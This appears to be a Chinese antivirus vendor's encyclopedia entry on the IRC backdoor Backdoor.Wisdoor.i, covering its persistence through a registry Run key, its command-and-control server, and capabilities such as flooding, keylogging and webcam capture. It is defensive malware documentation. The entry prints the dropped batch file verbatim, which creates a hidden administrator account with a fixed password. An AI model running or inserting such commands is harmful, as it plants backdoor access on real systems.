病毒名称:
Backdoor.Wisdoor.i
类别: 后门病毒
病毒资料:
破坏方法:
IRC后门程序
病毒采用"ASPack v2.12"压缩。
病毒运行后有以下行为:
一、将自己复制到%WINDIR%目录下,文件名为"SYSCFG16.EXE"。
二、修改注册表以下键值以达到其自启动的目的:
1.
HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\Currentversion\Run
增加数据项:"Windows System Configuration"
数据值为:"%WINDIR%\SYSCFG16.EXE"
三、创建名为"88FinalSolution88"的互斥量,以确保只有一个病毒文件在运行。
四、在%WINDIR%目录下创建名为"temp.bat"的批处理文件,文件的内容为:
"@echo off
net user /add System hakt
net localgroup /add Administrators System
del %0"
并运行这个批处理文件。通过这种方式病毒将会在本地计算机中增加一个属于系统管理员组的用户,用户名为"System",密码为"hakt"。这样病毒使用者就可以使用该用户名登录本地计算机。
五、试图连接IRC服务器--"iirc.exudus.org",并以特定的昵称登录,接收其控制端所发送的命令,为其控制端提供以下远程控制服务:
1.查看本机计算机系统信息;
2.对指定IP的计算机进行洪水攻击;
3.下载指定网址的文件;
4.运行指定的本地计算机文件;
5.结束本地计算机上的指定进程;
6.搜索本地计算机上的视频捕捉设置,为其控制端提供视频捕捉数据;
7.记录本地计算机用户的键盘操作信息。
病毒的清除法:
使用光华反病毒软件,彻底删除。
病毒演示:
病毒FAQ:
Windows下的PE病毒。
发现日期:
2005-1-12